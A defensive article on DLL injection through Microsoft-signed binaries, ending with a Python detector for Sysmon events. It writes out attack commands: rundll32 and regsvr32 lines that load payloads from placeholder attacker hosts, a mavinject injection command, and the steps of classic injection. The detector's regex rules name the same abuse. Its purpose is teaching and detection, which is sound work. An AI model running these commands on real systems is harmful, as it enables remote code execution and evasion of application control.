Introduction
Dynamic Link Library (DLL) injection is a technique used by attackers to execute malicious code within the address space of another process. What makes this technique particularly dangerous is that attackers can leverage legitimate, Microsoft-signed tools to perform the injection, making detection extremely difficult.
Living Off the Land Binaries (LOLBins)
The concept of "Living off the Land" refers to using legitimate system tools for malicious purposes. Several Microsoft-signed binaries can be abused to load arbitrary DLLs:
Rundll32.exe
The most well-known DLL loading mechanism. Rundll32 is designed to load and execute DLL functions:
rundll32.exe malicious.dll,EntryPoint
While commonly monitored, attackers use various obfuscation techniques to evade detection:
- Using UNC paths: rundll32.exe \\attacker\share\payload.dll,Start
- JavaScript execution: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"
Regsvr32.exe
Originally designed for COM object registration, Regsvr32 can load and execute arbitrary DLLs and even remote scripts:
regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
This technique, known as "Squiblydoo", allows execution of remote scriptlets while bypassing AppLocker.
Mavinject.exe
A lesser-known Microsoft tool that can inject DLLs into running processes:
mavinject.exe <PID> /INJECTRUNNING <path_to_dll>
This tool is signed by Microsoft and present on default Windows installations, making it an attractive option for attackers.
Other Abusable Binaries
- Msiexec.exe: Can execute DLLs embedded in MSI packages
- Odbcconf.exe: Can load arbitrary DLLs through response files
- Certutil.exe: Can download and decode DLLs from remote locations
- Mshta.exe: Can execute HTA files that load DLLs
Injection Techniques
Classic DLL Injection
- Open the target process with OpenProcess()
- Allocate memory in the target with VirtualAllocEx()
- Write the DLL path with WriteProcessMemory()
- Create a remote thread with CreateRemoteThread() pointing to LoadLibrary()
Reflective DLL Injection
A more advanced technique where the DLL maps itself into memory without using the Windows loader:
- No file on disk required
- No LoadLibrary() call
- Harder to detect with traditional tools
- Used by Metasploit, Cobalt Strike, and other frameworks
DLL Search Order Hijacking
Rather than injecting into a running process, attackers can place a malicious DLL in a location where a legitimate application will load it first:
- Application directory takes precedence over System32
- Missing DLLs can be planted
- Side-loading exploits signed applications
Detection and Mitigation
Detection Strategies
- Monitor LOLBin execution: Alert on unusual command-line parameters for rundll32, regsvr32, etc.
- Track DLL loads: Use Sysmon Event ID 7 to monitor image loads
- Analyze process relationships: DLLs loaded by unusual parent processes are suspicious
- Monitor for remote DLL loading: Network connections initiated by DLL-loading utilities such as rundll32 or regsvr32
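As an added example (not code from the original article), the following Python triage function applies these detection strategies to a handful of constructed Sysmon records: Event ID 1 command lines are matched against the LOLBin patterns shown earlier, and Event ID 7 image loads are flagged when an unsigned DLL is loaded from a user-writable path (the search-order hijacking and side-loading signal). Field names follow Sysmon's event schema; the sample events, paths and rule names are assumptions made for illustration.

```python
import re

# Constructed sample events (not real telemetry): a subset of Sysmon Event ID 1
# (process creation) and Event ID 7 (image load) fields.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\fileserver\share\payload.dll,Start"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://example.test/payload.sct scrobj.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mavinject.exe",
     "CommandLine": r"mavinject.exe 4242 /INJECTRUNNING C:\Users\Public\evil.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",   # benign control
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"EventID": 7, "Image": r"C:\Program Files\App\app.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\App\app.exe",         # benign control
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
]

# Command-line patterns for the LOLBin abuse described in the article.
CMDLINE_RULES = [
    ("rundll32_unc_path", re.compile(r"rundll32(\.exe)?\s+\\\\", re.I)),
    ("rundll32_javascript", re.compile(r"rundll32(\.exe)?\s+javascript:", re.I)),
    ("regsvr32_remote_scriptlet", re.compile(r"regsvr32.*\s/i:https?://", re.I)),
    ("mavinject_injectrunning", re.compile(r"mavinject.*\s/INJECTRUNNING\b", re.I)),
]
# Locations a standard user can write to; a DLL loaded from here is worth a look.
USER_WRITABLE = re.compile(r"^C:\\(Users|ProgramData|Windows\\Temp)\\", re.I)


def classify(event):
    """Return the names of every rule that fires for one Sysmon event dict."""
    hits = []
    if event["EventID"] == 1:
        cmd = event.get("CommandLine", "")
        hits += [name for name, rx in CMDLINE_RULES if rx.search(cmd)]
    elif event["EventID"] == 7:
        dll = event.get("ImageLoaded", "")
        if event.get("Signed", "").lower() != "true" and USER_WRITABLE.search(dll):
            hits.append("unsigned_dll_from_user_writable_path")
    return hits


def triage(events):
    """Flatten a batch of events into (process image, rule name) findings."""
    return [(e["Image"], h) for e in events for h in classify(e)]
```

In practice the two benign control records produce no findings, which is the behaviour to keep an eye on when tuning: rundll32 and signed System32 loads are normal, so the rules key on the argument shapes and load paths rather than on the binaries themselves.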
Mitigation Measures
- Application Control: Use Windows Defender Application Control (WDAC) or AppLocker
- Code Integrity: Enable Hypervisor-protected Code Integrity (HVCI)
- Block LOLBins: Restrict execution of unnecessary system utilities
- Enable Credential Guard: Prevents certain injection techniques
- Keep systems patched: Many injection techniques exploit known vulnerabilities
Conclusion
The abuse of legitimate Microsoft tools for DLL injection represents a growing threat. Defenders must understand these techniques and implement layered defenses that go beyond simple signature-based detection. Monitoring for behavioral anomalies in system utility usage is key to detecting these attacks.